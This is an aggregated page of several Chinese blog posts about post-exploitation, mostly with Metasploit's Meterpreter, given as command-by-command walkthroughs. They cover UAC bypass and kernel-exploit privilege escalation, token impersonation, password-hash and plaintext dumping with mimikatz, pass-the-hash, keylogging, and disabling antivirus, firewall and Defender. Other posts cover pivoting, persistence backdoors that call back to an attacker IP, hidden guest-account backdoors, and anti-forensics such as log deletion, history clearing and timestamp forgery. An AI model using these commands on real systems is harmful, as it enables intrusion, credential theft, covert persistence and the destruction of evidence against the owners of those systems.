精华内容
下载资源
问答
  • 后渗透

    2019-09-30 17:46:47
    MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门 提权 通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和...

    MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门

    提权

    通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和hash、安装特殊程序等,所以我们需要获取系统更高的权限。

    绕过UAC

    用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。
    MSF提供了如下几个模块帮助绕过UAC:

    以exploit/windows/local/bypassuac_eventvwr为例,其它模块的使用方法基本一致
    (1)首先需要在meterpreter下执行background命令让当前会话保存到后台。

    1
    background

    (2)使用sessions命令可以查看所有后台的会话,每个session对应一个id值,后面会经常用到。

    1
    session

    (3)使用use exploit/windows/local/bypassuac_eventvwr命令进入该模块,使用show options查看需要设置的参数。
    (4)将参数session设置为1,直接运行exploit或者run命令,执行成功之后会返回一个新的meterpreter会话。

    (5)使用getuid命令查看当前用户,此时仍然是普通用户,再使用getsystem命令就可以提升到system权限了。

    利用系统漏洞提权

    无论是linux还是windows都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如windows系统的ms13-081、ms15-051、ms16-032、ms17-010等,msf也集成了这些漏洞的利用模块。

    (1)使用search 补丁号进行搜索,就可以找到相关模块,以ms13-081为例。

    (2)使用use exploit/windows/local/ms13_081_track_popup_menu命令进入该模块,使用show options命令查看需要设置的参数。
    (3)使用set session 1命令设置后台的meterpreter会话id,再使用run命令运行,获取的就是SYSTEM权限。

    进程迁移

    当meterpreter单独作为一个进程运行时容易被发现,如果将它和系统经常运行的进程进行绑定,就能够实现持久化。
    1.查看当前会话的进程id

    命令:getpid
    2.查看目标运行的进程

    命令:ps
    3.绑定进程

    命令:migratep id

    令牌假冒

    在用户登录windows操作系统时,系统都会给用户分配一个令牌(Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的session或者cookie。

    msf提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
    1.查看当前用户
    命令:getuid
    2.使用use incognito命令进入该模块
    命令:use incognito
    3.查看存在的令牌
    命令:list_tokens-u
    4.令牌假冒
    命令:impersonate_token用户名
    注意用户名的斜杠需要写两个

    5.查看是否成功切换身份
    命令:getuid

    获取凭证

    在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者hash,再尝试登录内网其它服务器,可能取得意想不到的效果。
    1.使用meterpreter的run hashdump命令。
    2.使用load mimikatz加载mimikatz模块,再使用help mimikatz查看支持的命令。
    3.使用wdigest命令获取登录过的用户储存在内存里的明文密码。

    操作文件系统

    1.文件的基本操作
    ls:列出当前路径下的所有文件和文件夹。
    pwd 或 getwd:查看当前路径。
    search:搜索文件,使用search -h查看帮助。
    cat:查看文件内容,比如cat test.txt。
    edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。
    rm:删除文件。
    cd:切换路径。
    mkdir:创建文件夹。
    rmdir:删除文件夹。
    getlwd 或 lpwd:查看自己系统的当前路径。
    lcd:切换自己当前系统的目录。
    lls:显示自己当前系统的所有文件和文件夹。
    2.文件的上传和下载
    (1) upload
    格式:upload本地文件路径目标文件路径
    (2)download
    格式:download 目标文件路径 本地文件路径

    系统其它操作

    1.关闭防病毒软件
    run killav
    run post/windows/manage/killav
    2.操作远程桌面
    run post/windows/manage/enable_rdp开启远程桌面
    run post/windows/manage/enable_rdp username=test password=test添加远程桌面的用户(同时也会将该用户添加到管理员组)
    3.截屏
    screenshot
    4.键盘记录
    keyscan_start:开启键盘记录功能
    keyscan_dump:显示捕捉到的键盘记录信息
    keyscan_stop:停止键盘记录功能
    5.执行程序
    execute -h 查看使用方法
    -H:创建一个隐藏进程
    -a:传递给命令的参数
    -i:跟进程进行交互
    -m:从内存中执行
    -t:使用当前伪造的线程令牌运行进程
    -s:在给定会话中执行进程
    例:execute -f c:/temp/hello.exe

    端口转发和内网代理

    1.portfwd
    portfwd是meterpreter提供的端口转发功能,在meterpreter下使用portfwd -h命令查看该命令的参数。
    常用参数:
    -l:本地监听端口
    -r:内网目标的ip
    -p:内网目标的端口

    上面命令执行之后,会将10.1.1.3的3389端口转发到本地的2222端口。
    2.pivot
    pivot是msf最常用的代理,可以让我们使用msf提供的扫描模块对内网进行探测。
    (1)首先需要在msf的操作界面下添加一个路由表。
    添加命令:route add 内网ip 子网掩码 session的id
    打印命令:route print
    路由添加成功之后就可以在msf里访问10.1.1.0/24这个网段。
    (2)建立socks代理。
    如果其它程序需要访问这个内网环境,就可以建立socks代理。
    msf提供了3个模块用来做socks代理。
    auxiliary/server/socks4a
    use auxiliary/server/socks5
    use auxiliary/server/socks_unc
    以auxiliary/server/socks4a为例,查看需要设置的参数。
    一共两个参数:
    SRVHOST:监听的ip地址,默认为0.0.0.0,一般不需要更改。
    SRVPORT:监听的端口,默认为1080。
    直接运行run命令,就可以成功创建一个socks4代理隧道,在linux上可以配置proxychains使用,在windows可以配置Proxifier进行使用

    后门

    Meterpreter的shell运行在内存中,目标重启就会失效,如果管理员给系统打上补丁,那么就没办法再次使用exploit获取权限,所以需要持久的后门对目标进行控制。

    Msf提供了两种后门,一种是metsvc(通过服务启动),一种是persistence(支持多种方式启动)。
    1.metsvc
    (1) 使用run metsvc -h查看帮助,一共有三个参数。
    -A:安装后门后,自动启动exploit/multi/handler模块连接后门
    -h:查看帮助
    -r:删除后门
    (2) 安装后门
    命令:run metsvc
    命令运行成功后会在C:WindowsTEMP目录下新建随机名称的文件夹,里面生成3个文件(metsvc.dll、metsvc-server.exe、metsvc.exe)。
    同时会新建一个服务,显示名称为Meterpreter,服务名称为metsvc,启动类型为”自动”,绑定在31337端口。
    (3) 连接后门
    使用exploit/multi/handler模块,payload设置为windows/metsvc_bind_tcp,设置目标ip和绑定端口31337。
    2.persistence
    (1) 使用run persistence -h查看参数。
    -A:安装后门后,自动启动exploit/multi/handler模块连接后门
    -L:自启动脚本的路径,默认为%TEMP%
    -P:需要使用的payload,默认为windows/meterpreter/reverse_tcp
    -S:作为一个服务在系统启动时运行(需要SYSTEM权限)
    -T:要使用的备用可执行模板
    -U:用户登陆时运行
    -X:系统启动时运行
    -i:后门每隔多少秒尝试连接服务端
    -p:服务端监听的端口
    -r:服务端ip
    (2) 生成后门
    命令:run persistence -X -i 10 -r 192.168.1.9 -p 4444
    (3) 连接后门

    使用exploit/multi/handler模块,payload设置为windows/meterpreter/reverse_tcp,同时设置好服务端监听ip和端口

    转载于:https://www.cnblogs.com/ihacker/p/11448945.html

    展开全文
  • 利用msf进行后渗透中常见的知识点

    万次阅读 2020-10-28 17:34:18
    执行完,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr

    1.内网代理

    首先需要一个session
    在这里插入图片描述

    搭建路由

    然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行

    run autoroute -s 172.16.250.0/24

    在这里插入图片描述
    执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下:
    在这里插入图片描述
    也可以使用run autoroute -p来查询路由配置情况

    配置socks5

    这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过proxychains的配合就可以完全利用这个session作为我们在内网的代理了。
    具体操作为

    use auxiliary/server/socks_proxy 
    set version 5
    run
    

    在这里插入图片描述

    配置proxychains

    找到proxychains.conf文件,不同系统存放位置不一样,macos是/usr/local/etc/proxychains.conf,linux是/etc/proxychains.conf。
    使用vim命令编辑,将dynamic_chain前面的#去掉,然后加上socks的服务器的ip与端口
    在这里插入图片描述
    在这里插入图片描述

    使用代理

    直接执行命令proxychains nmap就是利用这个代理启动nmap,这边做个示范,用proxychains执行ssh并测试结果。
    我们已经拿到了172.16.250.10的session,用这个session为跳板做了路由,来转发我们访问172.16.250.0/24的所有的流量,这时候我们用proxychains来使用ssh命令访问172.16.250.30,这时候对于.30来说,它其实是在跟.10通信,实验如下:

    • 执行proxychains ssh
      在这里插入图片描述
    • 查看网络情况,发现172.16.250.30是与1872.16.250.10建立了socket连接,因此代理成功,结果如下:
      在这里插入图片描述

    2.端口转发

    可以将远程端口转发到本地,使用命令portfwd
    portfwd add -l 1234 -r 172.16.250.30 -p 8080
    #将远程的172.16.250.30的8080端口转发到本地的1234端口。
    在这里插入图片描述
    直接在本地访问127.0.0.1:1234发现可以访问
    在这里插入图片描述
    在这里插入图片描述

    3.常见高级参数

    这些参数一般在生成web_delivery_payload或者使用exp攻击的时候有可能会用到:

    参数字段 效果
    set PrependMigrate true 启用迁移进程(默认为:false)
    set PrependMigrateProc explorer.exe 迁移到此进程名:explorer.exe
    set SessionExpirationTimeout 0 会话超时时间0秒(会话永不超时),默认为:604800
    set SessionCommunicationTimeout 0 会话通信超时0秒(会话永不过期),默认为:300
    set EnableStageEncoding true 启用Stage传输体载荷编码(默认为:false)
    set EnableUnicodeEncoding true 启用Unicode编码(默认为:false)
    set stageencoder x86/fnstenv_mov 设置传输编码为:x86/fnstenv_mov
    set HandlerSSLCert /tmp/772023.pem 指定HTTPS PEM格式SSL证书路径
    set StagerVerifySSLCert true 验证HTTPS SSL证书
    set ExitOnSession false 退出会话为:false,保持端口监听(默认为:true)
    set AutoRunScript migrate -f 自动运行migrate脚本,-f或-n参数
    set InitialAutoRunScript migrate -f 自动运行migrate脚本,优先AutoRunScript

    在这里插入图片描述

    4.meterpreter常用命令

    1. execute
      可以在对方主机执行文件或者命令。举例如下:
      execute -H -i -f cmd.exe #隐藏的开启cmd并且是交互状态的。
      execute -H -m -d notepad.exe -f wce.exe -a “-o wce.txt”
      #-d 在目标主机执行时显示的进程名称(用以伪装)
      #-m 直接从内存中执行
      #"-o wce.txt"是wce.exe的运行参数
    2. rev2self#回到控制目标主机的初始用户账户下
    3. shell#获得控制台权限
    4. shutdown#关闭了受害者的计算机
    5. sysinfo # 查看目标机系统信息,如机器名,操作系统等
    6. add_user username password -h ip #在远程目标主机上添加一个用户
    7. add_group_user “Domain Admins” username -h ip #将用户添加到目标主机的域管理员组中
    8. hashdump #输出用户hash,需要管理员权限
    9. getpid #获取当前meterpreter所在的进程id
    10. use命令查看扩展
      在这里插入图片描述
    11. arp #查看arp列表
    12. 最终一定会执行的clearev命令,删除日志。

    5.常用信息收集脚本模块

    脚本 效果
    run post/windows/gather/checkvm #是否虚拟机
    run post/windows/gather/enum_applications #获取安装软件信息
    run post/windows/gather/dumplinks #获取最近的文件操作
    run auxiliary/scanner/portscan/tcp rhost=127.0.0.1 #扫描
    run arp_scanner -r 192.168.1.1/24 #arp扫描
    run post/multi/gather/env #查看环境变量
    run getcountermeasure #查看防火墙配置情况
    run post/windows/gather/enum_patches #查看补丁情况
    run killav #关闭AV
    run post/windows/gather/enum_logged_on_users #查看用户登录情况(现在与过去登陆过的用户)
    run keylogrecorder #记录键盘信息
    run win32-sshserver 安装openssh服务
    run post/windows/gather/forensics/enum_drives #记录磁盘分区信息
    run persistence #持久化
    run post/windows/manage/enable_rdp #开启远程桌面
    run post/windows/gather/enum_ie #获取IE缓存
    run post/windows/gather/enum_chrome #获取Chrome缓存
    run scraper #获取常见信息,并存储在~/.msf4/logs/scripts/scraper目录下在这里插入图片描述

    补充:

    1. scraper生成的文件:有注册表、环境变量、组等各种信息
      在这里插入图片描述
    2. run persistence
      -A 自动启动一个匹配的exploit / multi / handler来连接到代理
      -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
      -P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
      -S 作为服务自动启动代理程序(具有SYSTEM权限)
      -T 要使用的备用可执行模板
      -U 用户登录时自动启动代理
      -X 系统引导时自动启动代理程序
      -h 这个帮助菜单
      -i 每次连接尝试之间的时间间隔(秒)
      -p 运行Metasploit的系统正在侦听的端口
      -r 运行Metasploit监听连接的系统的IP

    6.盗取令牌

    1. 加载incognito模块
      use incognito
      在这里插入图片描述

    2. 查看可以被使用的令牌
      list_tokens -u#查看可被盗取的用户的令牌
      在这里插入图片描述
      list_tokens -g#查看可被盗取的用户组的令牌
      在这里插入图片描述

    3. 盗取令牌进行使用
      impersonate_token SHANFENGLAN\test
      如果impersonation tokens available部分有可用令牌,就可以使用上述命令进行盗取。

    4. 窃取程序的令牌
      steal_token 10228#窃取一个程序的令牌,10228为程序的pid,查看pid的时候有些程序不显示用户是谁,这是因为你的权限不够,如果权限足够就可以看到几乎所有程序的用户。
      在这里插入图片描述
      ```drop_token 10228``#停止窃取此程序的令牌
      在这里插入图片描述

    7.bypassuac

    use exploit/windows/local/bypassuac_sdclt
    配置好session,执行run即可,经测试,在win10上成功。
    在这里插入图片描述

    8. 密码爆破模块

    模块 用途
    auxiliary/scanner/mysql/mysql_login mysql用户名密码爆破
    auxiliary/scanner/ftp/ftp_login ftp用户名密码爆破
    auxiliary/scanner/ssh/ssh_login ssh用户名密码爆破
    auxiliary/scanner/telnet/telnet_login telnet用户名密码爆破
    auxiliary/scanner/smb/smb_login smb用户名密码爆破
    auxiliary/scanner/oracle/oracle_login oracle用户名密码爆破
    auxiliary/scanner/postgres/postgres_login postgres用户名密码爆破
    auxiliary/scanner/vnc/vnc_login vnc用户名密码爆破
    auxiliary/scanner/pcanywhere/pcanywhere_login pcanywhere用户名密码爆破
    auxiliary/scanner/snmp/snmp_login snmp用户名密码爆破
    auxiliary/scanner/ftp/anonymous ftp匿名登陆
    auxiliary/scanner/http/owa_ews_login 邮箱密码爆棚
    auxiliary/scanner/http/owa_login 邮箱密码爆棚

    9.通过shell关闭防火墙

    netsh advfirewall set allprofiles state off#windows
    systemctl stop firewalld#linux

    10.对抗电子取证(修改MACE)

    1. 查询文件修改时间
      timestomp -v [file_path]
      在这里插入图片描述
    2. 修改文件创建时间
      timestomp 3333.txt -c "10/27/2015 14:22:11"
      在这里插入图片描述
      补充:timestomp的其他选项
      在这里插入图片描述

    entery modified含义是,最后一次打开文件夹进行修改的时间,modified是修改完成的时间。

    11.提权

    1. ms10-073\ms10-092\ms14-002
      Windows XP
      Windows Server 2003

    2. ms15-001\ms15_051
      Microsoft Windows Vista
      Microsoft Windows Server 2012 R2
      Microsoft Windows Server 2012
      Microsoft Windows Server 2008 R2
      Microsoft Windows Server 2008
      Microsoft Windows Server 2003
      Microsoft Windows RT 8.1
      Microsoft Windows RT
      Microsoft Windows 8.1
      Microsoft Windows 8
      Microsoft Windows 7

    3. ms16-016
      根据微软官方信息显示,此漏洞存在于在:
      Windows Vista SP2
      Windows Server 2008 x86 & x64
      Windows Server 2008 R2 x64
      Windows 7 x86 & x64
      Windows 8.1 x86 & x64
      系统中提升权限至系统权限,以下系统中导致系统拒绝服务(蓝屏):
      Windows Server 2012
      Windows Server 2012 R2
      Windows RT 8.1
      Windows 10

    4. ms16-032
      多exp

    5. MS16-075(烂土豆)
      全版本通杀

    6. CVE-2018-8120
      Microsoft Windows Server 2008 R2 for x64-based Systems SP1
      Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
      Microsoft Windows Server 2008 for x64-based Systems SP2
      Microsoft Windows Server 2008 for Itanium-based Systems SP2
      Microsoft Windows Server 2008 for 32-bit Systems SP2
      Microsoft Windows 7 for x64-based Systems SP1
      Microsoft Windows 7 for 32-bit Systems SP1

    7. mysql 提权
      mysql_mof mof提权

    展开全文
  • 渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。持续渗透的本质是线索关联,而线索关联为后续的攻击链方...后渗透的本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。
  • 后渗透 1

    2019-07-22 09:43:50
    后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础 首先,后渗透是什么意思?难道渗透还分前渗透和后渗透? 当然不是,后渗透是渗透测试之后的一系列扫尾工作,当你通过“增删改查”等...

    前言:

    渗透的本质是信息搜集,信息的搜集整理为后续的情报跟进提供了保证。

    后渗透的本质是权限把控,权限把控为后渗透提供了以牺牲时间换取空间的强大基础

    首先,后渗透是什么意思?难道渗透还分前渗透和后渗透?

    当然不是,后渗透是渗透测试之后的一系列扫尾工作,当你通过“增删改查”等操作(任意文件上传, 任意文件下载, 任意文件删除  任意文件读取)拿到webshell之后再次提权拿到系统权限之后的一系列操作 例如 留个后门方便下次再来啊,清理一下痕迹啊,把源码给down下来,脱个库啊之类的操作

    但是,最好不要去尝试 嗯 很严的 脱裤五十条三年

    首先 在windows上留后门 分为用户后门和程序后门  

    用户后门的话

    guest用户提权   net user guest 密码 /add  创建一个访客用户 net user guest /active:yes   激活用户 net localGroup administrators guest /add  把guest放到管理员的用户组里  这个方法好在了 基本每台设备上都会有guest 就算平时不用 但是会有这样的用户 对于那些没有什么电脑实操经验的人来说还行

     

    但是面对那些运维啊 或者ctf比赛里的参赛选手来说 就不行了 很容易就被发现了

    这种情况下呢 其实还是有方法的

    在HKEY-LOCAL-MACHINE里找到管理员对应的f表 复制二进制数值 将这个二进制数值黏贴给guest的f表 这样就不会那么容易被发现了 给它赋了管理员的权限 却没有在那个组里

    然后把主机的远程登陆打开

     

    改一下就可以

    然后远程一下 win+r  Mstsc

    当然了我没有直接连我的虚拟机 随意的敲了一个 到时候会提示登陆 只要输入我们刚刚留的后门账号的用户名和密码就可以了  这样的好处是 当翻看日志的时候 没有办法发现你如果你要是直接创建账户 然后在放进管理员用户组 只要翻看系统日志就可以发现你

    但是现在这种方法就...不是很好用 因为有杀软

    程序后门的话 见到的更多一些

    lpk后门 生成一个dll文件 捆绑一下 能免杀最好 捆绑一下 然后拿远程的工具去连接

    但是需要你有一个公网ip  很强的方法 但是。。没用过

    Linux下也是,使用远程的工具 打开ssh 然后去连接  工具的话 putty

    Putty是命令行的 我不知道winscp能不能用 这个是直观的看到文件的

    ssh 服务器名称@ip地址

    Linux下载openssh  往里面留一个后门

     

    然后是清理痕迹

    我们每一次访问页面都会在访问日志里面留下痕迹

    什么时候访问的 哪个ip访问的 访问了哪个页面等等

    这也是为什么我们有时候扫一下的时候会被发现 然后ip就被禁止了

    因为短时间内大规模的访问会让管理员 让系统警觉 从而发现攻击

    就算提交了马 也会因为修改时间让人发现 历史命令也会被存下来

    所以为什么 清理痕迹 那么重要

    Linux下清理痕迹

     历史记录一般都被保存在 /var/log目录下

    例如dpkg.log            当你访问了服务器之后会有httped目录 里面也会有大量的日志

    Message 里面存储了login,passwd之类的历史 也需要注意

    当我们发现了这些日志文件之后 要么就删除掉 毁尸灭迹

    要么就改掉

    把你的ip全都替换掉 访问页面全都替换掉

    这里其实还可以挂一个一句话 文件包含

    上传的文件 touch */

    然后history -c 把我的历史命令也清空

    Windows的历史在

    C:\windows\system32\winevt\logs\system.evtx 系统日志

    C:\windows\system32\winevt\logs\application.evtx 应用程序日志

    C:\windows\system32\winevt\logs\security.evtx 安全日志

    Windows下del一下就可以了

    Down源码和脱裤都可以通过上传马来实现

    当然了 后渗透的利器msfvenom很好用

    留在下一篇博客写

     

    展开全文
  • 后渗透流程

    2019-12-09 20:20:45
    后渗透流程 权限提升 绕过UAC msf模块 Exploit/windows/local/bypassuac Exploit/windows/local/bypassuac_injection Exploit/windows/local/bypassuac_vbs 系统提权 提高程序运行级别 msf模块(Exploit/windows...

    后渗透流程

    权限提升

    绕过UAC

    msf模块

    • Exploit/windows/local/bypassuac
    • Exploit/windows/local/bypassuac_injection
    • Exploit/windows/local/bypassuac_vbs

    系统提权

    提高程序运行级别

    • msf模块(Exploit/windows/local/ask)
      缺点:需要uac交互

    后渗透信息收集

    msf模块(post)

    • 获取目标主机的分区情况:post/windows/gather/forensics/enum_drives

    • 判断是否为虚拟机:
      post/windows/gather/checkvm

    • 开启了哪些服务:
      post/windows/gather/enum_applications

    • 查看共享:
      post/windows/gather/enum_shares

    • 获取主机最近的系统操作:
      post/windows/gather/dumplinks

    • 查看补丁:
      post/windows/gather/enum_applicationsenum_patches

    • scraper脚本
      路径:/usr/share/metasploit-framework/scripts/meterpreter

    (meterpreter下run scraper)
    保存信息的目录:/root/.msf4/logs/scripts/scraper/192.xxx.xx.xx.xx

    • winenum脚本(meterpreter下run winenum)

    数据包抓获

    目的:抓获与外围的交互
    使用地点:找不到进入内网的方法(主机在防火墙,开放端口少,是服务器的子网)

    抓包

    sniffer会过滤掉自身merterpreter产生的流量,直接去抓取和主机相关的数据包信息

    • 加载sniffer:load sniffer
    • 查看网卡信息;sniffer_interfaces
    • 开启监听:sniffer_start 1
    • 导出数据包:sniffer_dump 1 1.cap

    解包

    • auxiliary/sniffer/psnuffle

    meterpreter模块

    • run packetrecorder
    • run post/windows/manage/rpcapd_start

    抓hash

    基础:密码格式:
    用户名称:RID:LM-HASH值:NT-HASH值
    ###获取hash值

    • hashdump
    • run post/windows/gather/smart_hashdump
      • 检查权限和系统类型
      • 检查是否是域控制服务器
      • 从注册表读取hash,注入lsass进程
      • 如果是08server并且具有管理员权限,直接getsystem尝试提权
      • 如果是win7且UAC关闭并具有管理员权限,从注册表读取
      • 03/XP直接getsystem,从注册表读取hash
    • mimikatz(已集合到mimikatz)
      • 需要administrator及以上权限,需要免杀
      • privilege::debug #查看权限
      • sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话)
      • sekurlsa::ekeys #获取kerberos加密凭证

    hash破解

    • Hashcat

    文章:
    (https://www.anquanke.com/post/id/177123)

    • hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

    hash传递攻击

    UAC注册表:
    HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System

    进shell,中文乱码,输入chcp 65001
    shell改注册表uac为0reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

    • MSF
    • exploit/windows/smb/psexec

    use exploit/windows/smb/psexec
    set payload windows/meterpreter/reverse_tcp set LHOST 192.168.206.128
    set RHOST 192.168.206.101
    set SMBUser administrator
    set SMBPass AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C0 89C0
    exploit

    • mimikkatz
      sekurlsa::pth /user:Administrator /domain:WIN-RRI9T9SN85D /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

    关闭防火墙及杀毒软件

    -关闭防火墙(shell)
    - Netsh advfirewall set allprofiles state off(管理员及以上权限)

    • 关闭Denfender(shell)
      • Net stop windefend
    • 关闭DEP(shell)
      • Bcdedit.exe /set {current} nx AlwaysOff
    • 关闭杀毒软件(meterpreter)
      • Run killav
      • Run post/windows/manage/killava

    远程桌面

    • 开启远程桌面
      • run post/windows/manage/enable_rdp(方式一)
      • run getgui -e (方式二)

    run multi_console__command -r /root/.msf4/loot/20191206223922_default_192.168.85.157_host.windows.cle_974816.txt
    (关闭远程桌面)

    • 开启远程桌面并添加新用户
      • run getgui -u root -p pass

    开启远程桌面并绑定在8888端口

    - `run getgui -e -f 8888`
    
    • 截图
      • load espia
      • screengrab
    • 远程桌面连接
      kali下:rdesktop -u root -p 123 192.168.85.157

    令牌假冒

    • windows安全相关概念

      • session
      • Windows Station
      • Desktop
      • Login Session:不同账号登陆产生不同的登陆Session,代表不同的账号权限
    • incognito

      • load incognito
      • list_tokens -u
        (非交互的token多出来一条EA\Administrator)
      • impersonate_token EA\Administrator
      • 成功登陆

    跳板攻击

    • pivoting
      • 利用已经被入侵的主机作为跳板来攻击网络中其他系统
      • 访问由于路由问题而不能直接访问的内网系统
    • 添加路由
      • 方式一:run autoroute -s 192.168.102.0/24
      • 方式二:run post/multi/manage/autoroute(更新)
      • 利用win7攻击内网服务器
      • 扫描内网网络
        • run post/windows/gather/arp_scanner rhosts=192.168.102.0/24
        • use auxiliary/scanner/portscan/tcp

    ProxyChains代理设置

    • 配置:vim /etc/proxychain.conf(加上ip)
    • Socket代理
      • auxiliary/server/socks4a
    • ProxyChains
      • ProxyChains是为GUN\Linux操作系统而开发的工具,任何TCP连接都可以通过TOP或者SCOKS4,SCOKS5,HTTP/HTTPS路由到目的地。在这个通道技术中可以使用多个代理服务器。除此之外提供匿名方式,诸如用于中转跳板的应用程序也可以用于中转跳板的应用程序也可以用于对发现的新网络进行直接通信。
      • proxychains nmap -sT -sV -Pn -n -p 22,80,135,139,445 --script=smb-vuln-ms08-067.nse 192.168.xx.xxx

    后门植入

    • meterpreter后门: Metsvc
      • 通过服务启动
      • run metsvc -A #设定端口,上传后门文件
    • meterpreter后门:persistence
      • 通过启动型启动
      • 特性:定期会连,系统启动时回连,自动运行
      • run persistence -A -S -U -i 60 -p 4321 -r 192.168.101.111
    展开全文
  • 后渗透攻击

    2021-02-13 23:45:25
    后渗透攻击 查看目标机进程 meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [S
  • 渗透测试——后渗透攻击

    千次阅读 2019-02-18 17:49:14
    Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。...
  • 后渗透脚本知识

    2020-07-13 10:05:26
    一、后渗透脚本知识 权限维持、权限提升、内网渗透等 内网渗透:信息搜集、读取用户hash、浏览器密码 域渗透:获取域控的控制权 二、Meterpreter基本概念 Meterpreter是Metasploit框架中的一个扩展模块,在攻击成 功...
  • linux 后渗透测试

    2017-07-26 18:47:00
    linux 后渗透测试
  • 后渗透(一)

    千次阅读 2019-04-15 17:50:09
    本文及以后系列仅限于针对小白的学习,首先我们先大体了解一下我们要做的渗透到底有哪些,渗透包括但不限于前端渗透(web安全),后渗透及内网渗透,此系列为后渗透的讲解。 二.什么是后渗透 我们了解到前端安全...
  • Meterpreter后渗透测试

    2020-05-05 15:33:31
    Meterpreter后渗透测试 特征 Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个 ...
  • 一、后渗透阶段 二、后渗透的命令 三、meterpreter命令 1、基本命令 2、文件系统命令 3、网络命令 4、系统命令 四、后渗透模块 1、后渗透模块的使用方法 2、使用实例 五、meterpreter的应用 1、植入后门...
  • 运行环境: kali工具msf ip:192....是administrator权限,为了后渗透方便我们需要把目标的服务器的杀毒,防火墙,以及一些防护软件给关闭了。 目标服务器防火墙开着,我们要使用我们得到的shell给它关闭 关闭win...
  • Metasploit之——基本后渗透命令

    千次阅读 2019-01-27 15:22:45
    核心Meterpreter命令指的是已经被Meterpreter攻击载荷成功渗透的计算机向我们提供的用于后渗透操作的基本功能。 注意:Metasploit的后渗透命令都是在拿到了目标主机的Meterpreter权限之后,在Meterpreter命令行下...
  • 后渗透介绍及运用

    千次阅读 2019-11-04 23:11:19
    目录一、前言二、后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获取权限11.捕捉屏幕12.得到远程桌面...
  • 后渗透攻击阶段 PTES

    2020-06-28 08:25:51
    后渗透攻击阶段。拿到客户一些系统的管理权限后,由此为“跳板”,实现内网“漫游”。在这个过程中,有经验的大牛,能在信息有限的情况下,识别出关键信息基础设施,找到客户组织最有价值的信息和资产,并展示出对...
  • 后渗透工具:meterpreter 该工具具有多重功能,使后续的渗透变得更加容易 获取目标机的meterpreter shell后,就进入了后期渗透利用阶段 后期渗透模块有200多个 meterpreter优势: 纯内存工作模式,不需要对磁盘进行...
  • 后渗透攻击:后门

    2020-08-12 23:29:04
    后渗透攻击:后门 在完成了提升权限后,我们就应该创建后门了,以维持对目标主机的控制权。这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。 操作系统后门 1.Cymothoa后门 Cymothoa...
  • 后渗透之meterpreter学习笔记

    千次阅读 多人点赞 2019-09-25 09:45:11
    Meterpreter是Metasploit框架中的一个扩展模块,作为后渗透阶段的利器,其强大之处可想而知,我这里就简单介绍一下常用命令。 0x01 系统命令 基本系统命令 background # 将当前会话放置后台 sessions # sessions...
  • 7.Metasploit后渗透

    2019-07-03 21:05:00
    后渗透的第一步,更多地了解靶机信息,为后续攻击做准备。 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉程序,我们获取到...
  • 后渗透攻击:信息收集 Metasploit提供了一个非常强大的后渗透工具——Meterpreter,该工具具有多重功能,使后续的渗透入侵变得更容易。 Meterpreter具有以下优势: 1.纯内存工作模式,不需要对磁盘进行任何写入操作...
  • 后渗透工具Koadic实战

    2019-05-01 14:13:08
    Koadic是发布于DEFCON上的一个后渗透工具,它可用于以上列举的最后两个阶段,即权限维持和数据渗漏。 利用Windows脚本宿主,Koadic提供类似于批处理文件的脚本功能。正因如此,它可以在包括Windows 10在内的多个...
